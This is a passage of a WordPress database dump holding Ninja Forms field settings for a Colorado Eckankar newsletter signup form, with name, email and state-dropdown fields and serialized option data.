state!'),(6360,223,'desc_el','div','desc_el','div'),(6361,223,'show_desc','0','show_desc','0'),(6362,223,'desc_pos','none','desc_pos','none'),(6363,223,'desc_text','','desc_text',''),(6364,223,'element_class','','element_class',''),(6365,223,'default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado - Newsletter Signup</span></span></span></strong></span></h3><p> <span style=\"font-size: 18px;\">Get the latest news from around the state!</span></p>','default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Eckankar In Colorado - Newsletter Signup</span></span></span></strong></span></h3><p> <span style=\"font-size: 18px;\">Get the latest news from around the state!</span></p>'),(6366,223,'key','html_306','key','html_306'),(6367,223,'container_class','','container_class',''),(6368,223,'drawerDisabled','','drawerDisabled',''),(6369,223,'parent_id','21','parent_id','21'),(6370,224,'objectType','Field','objectType','Field'),(6371,224,'objectDomain','fields','objectDomain','fields'),(6372,224,'editActive','','editActive',''),(6373,224,'order','2','order','2'),(6374,224,'type','textbox','type','textbox'),(6375,224,'def_id','6','def_id','6'),(6376,224,'label','First Name','label','First Name'),(6377,224,'label_pos','above','label_pos','above'),(6378,224,'mask','','mask',''),(6379,224,'datepicker','0','datepicker','0'),(6380,224,'first_name','1','first_name','1'),(6381,224,'last_name','0','last_name','0'),(6382,224,'from_name','0','from_name','0'),(6383,224,'user_info_field_group','1','user_info_field_group','1'),(6384,224,'show_help','0','show_help','0'),(6385,224,'help_text','','help_text',''),(6386,224,'calc_auto_include','0','calc_auto_include','0'),(6387,224,'calc_option','0','calc_option','0'),(6388,224,'placeholder','','placeholder',''),(6389,224,'user_address_1','','user_address_1',''),(6390,224,'user_address_2','','user_address_2',''),(6391,224,'user_city','','user_city',''),(6392,224,'user_zip','','user_zip',''),(6393,224,'user_phone','','user_phone',''),(6394,224,'user_email','','user_email',''),(6395,224,'disable_input','0','disable_input','0'),(6396,224,'input_limit','','input_limit',''),(6397,224,'input_limit_type','char','input_limit_type','char'),(6398,224,'input_limit_msg','','input_limit_msg',''),(6399,224,'user_state','0','user_state','0'),(6400,224,'autocomplete_off','0','autocomplete_off','0'),(6401,224,'num_sort','0','num_sort','0'),(6402,224,'admin_label','','admin_label',''),(6403,224,'user_info_field_group_name','','user_info_field_group_name',''),(6404,224,'user_info_field_group_custom','','user_info_field_group_custom',''),(6405,224,'show_desc','0','show_desc','0'),(6406,224,'desc_pos','none','desc_pos','none'),(6407,224,'desc_text','','desc_text',''),(6408,224,'element_class','','element_class',''),(6409,224,'required','1','required','1'),(6410,224,'key','textbox_307','key','textbox_307'),(6411,224,'default','','default',''),(6412,224,'container_class','one-third first','container_class','one-third first'),(6413,224,'manual_key','','manual_key',''),(6414,224,'custom_mask','','custom_mask',''),(6415,224,'custom_name_attribute','','custom_name_attribute',''),(6416,224,'personally_identifiable','','personally_identifiable',''),(6417,224,'parent_id','21','parent_id','21'),(6418,225,'objectType','Field','objectType','Field'),(6419,225,'objectDomain','fields','objectDomain','fields'),(6420,225,'editActive','','editActive',''),(6421,225,'order','3','order','3'),(6422,225,'type','lastname','type','lastname'),(6423,225,'def_id','7','def_id','7'),(6424,225,'label','Last Name','label','Last Name'),(6425,225,'label_pos','above','label_pos','above'),(6426,225,'mask','','mask',''),(6427,225,'datepicker','0','datepicker','0'),(6428,225,'first_name','0','first_name','0'),(6429,225,'from_name','0','from_name','0'),(6430,225,'user_info_field_group','1','user_info_field_group','1'),(6431,225,'show_help','0','show_help','0'),(6432,225,'help_text','','help_text',''),(6433,225,'calc_auto_include','0','calc_auto_include','0'),(6434,225,'calc_option','0','calc_option','0'),(6435,225,'placeholder','','placeholder',''),(6436,225,'user_address_1','','user_address_1',''),(6437,225,'user_address_2','','user_address_2',''),(6438,225,'user_city','','user_city',''),(6439,225,'user_zip','','user_zip',''),(6440,225,'user_phone','','user_phone',''),(6441,225,'user_email','','user_email',''),(6442,225,'disable_input','0','disable_input','0'),(6443,225,'input_limit','','input_limit',''),(6444,225,'input_limit_type','char','input_limit_type','char'),(6445,225,'input_limit_msg','','input_limit_msg',''),(6446,225,'user_state','0','user_state','0'),(6447,225,'autocomplete_off','0','autocomplete_off','0'),(6448,225,'num_sort','0','num_sort','0'),(6449,225,'admin_label','','admin_label',''),(6450,225,'user_info_field_group_name','','user_info_field_group_name',''),(6451,225,'user_info_field_group_custom','','user_info_field_group_custom',''),(6452,225,'show_desc','0','show_desc','0'),(6453,225,'desc_pos','none','desc_pos','none'),(6454,225,'desc_text','','desc_text',''),(6455,225,'element_class','','element_class',''),(6456,225,'required','1','required','1'),(6457,225,'key','lastname_308','key','lastname_308'),(6458,225,'default','','default',''),(6459,225,'container_class','one-third','container_class','one-third'),(6460,225,'custom_name_attribute','lname','custom_name_attribute','lname'),(6461,225,'personally_identifiable','1','personally_identifiable','1'),(6462,225,'parent_id','21','parent_id','21'),(6463,226,'objectType','Field','objectType','Field'),(6464,226,'objectDomain','fields','objectDomain','fields'),(6465,226,'editActive','','editActive',''),(6466,226,'order','4','order','4'),(6467,226,'type','email','type','email'),(6468,226,'def_id','14','def_id','14'),(6469,226,'label','Email','label','Email'),(6470,226,'label_pos','above','label_pos','above'),(6471,226,'mask','','mask',''),(6472,226,'datepicker','0','datepicker','0'),(6473,226,'first_name','0','first_name','0'),(6474,226,'last_name','0','last_name','0'),(6475,226,'from_name','0','from_name','0'),(6476,226,'user_address_1','0','user_address_1','0'),(6477,226,'user_address_2','0','user_address_2','0'),(6478,226,'user_city','0','user_city','0'),(6479,226,'user_zip','0','user_zip','0'),(6480,226,'user_phone','0','user_phone','0'),(6481,226,'user_info_field_group','1','user_info_field_group','1'),(6482,226,'show_help','0','show_help','0'),(6483,226,'help_text','','help_text',''),(6484,226,'calc_auto_include','0','calc_auto_include','0'),(6485,226,'calc_option','0','calc_option','0'),(6486,226,'placeholder','','placeholder',''),(6487,226,'disable_input','0','disable_input','0'),(6488,226,'input_limit','','input_limit',''),(6489,226,'input_limit_type','char','input_limit_type','char'),(6490,226,'input_limit_msg','','input_limit_msg',''),(6491,226,'user_state','0','user_state','0'),(6492,226,'autocomplete_off','0','autocomplete_off','0'),(6493,226,'num_sort','0','num_sort','0'),(6494,226,'admin_label','','admin_label',''),(6495,226,'user_info_field_group_name','','user_info_field_group_name',''),(6496,226,'user_info_field_group_custom','','user_info_field_group_custom',''),(6497,226,'show_desc','0','show_desc','0'),(6498,226,'desc_pos','none','desc_pos','none'),(6499,226,'desc_text','','desc_text',''),(6500,226,'element_class','','element_class',''),(6501,226,'required','1','required','1'),(6502,226,'key','email_309','key','email_309'),(6503,226,'default','','default',''),(6504,226,'container_class','one-third','container_class','one-third'),(6505,226,'custom_name_attribute','email','custom_name_attribute','email'),(6506,226,'personally_identifiable','1','personally_identifiable','1'),(6507,226,'parent_id','21','parent_id','21'),(6508,227,'objectType','Field','objectType','Field'),(6509,227,'objectDomain','fields','objectDomain','fields'),(6510,227,'editActive','','editActive',''),(6511,227,'order','5','order','5'),(6512,227,'type','listselect','type','listselect'),(6513,227,'def_id','11','def_id','11'),(6514,227,'label','State','label','State'),(6515,227,'label_pos','above','label_pos','above'),(6516,227,'multi_size','5','multi_size','5'),(6517,227,'list_show_value','1','list_show_value','1'),(6518,227,'list','a:0:{}','list','a:0:{}'),(6519,227,'list_type','dropdown','list_type','dropdown'),(6520,227,'user_state','1','user_state','1'),(6521,227,'user_info_field_group','1','user_info_field_group','1'),(6522,227,'populate_term','','populate_term',''),(6523,227,'show_help','0','show_help','0'),(6524,227,'help_text','','help_text',''),(6525,227,'calc_auto_include','0','calc_auto_include','0'),(6526,227,'calc_option','0','calc_option','0'),(6527,227,'num_sort','0','num_sort','0'),(6528,227,'admin_label','','admin_label',''),(6529,227,'user_info_field_group_name','','user_info_field_group_name',''),(6530,227,'user_info_field_group_custom','','user_info_field_group_custom',''),(6531,227,'show_desc','0','show_desc','0'),(6532,227,'desc_pos','none','desc_pos','none'),(6533,227,'desc_text','','desc_text',''),(6534,227,'element_class','','element_class',''),(6535,227,'required','1','required','1'),(6536,227,'options','a:51:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Colorado\";s:5:\"value\";s:2:\"CO\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Alabama\";s:5:\"value\";s:2:\"AL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Alaska\";s:5:\"value\";s:2:\"AK\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Arizona\";s:5:\"value\";s:2:\"AZ\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Arkansas\";s:5:\"value\";s:2:\"AR\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:10:\"California\";s:5:\"value\";s:2:\"CA\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:11:\"Connecticut\";s:5:\"value\";s:2:\"CT\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:8:\"Delaware\";s:5:\"value\";s:2:\"DE\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:8;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:20:\"District of Columbia\";s:5:\"value\";s:2:\"DC\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:9;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Florida\";s:5:\"value\";s:2:\"FL\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:10;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:7:\"Georgia\";s:5:\"value\";s:2:\"GA\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:11;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:6:\"Hawaii\";s:5:\"value\";s:2:\"HI\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons 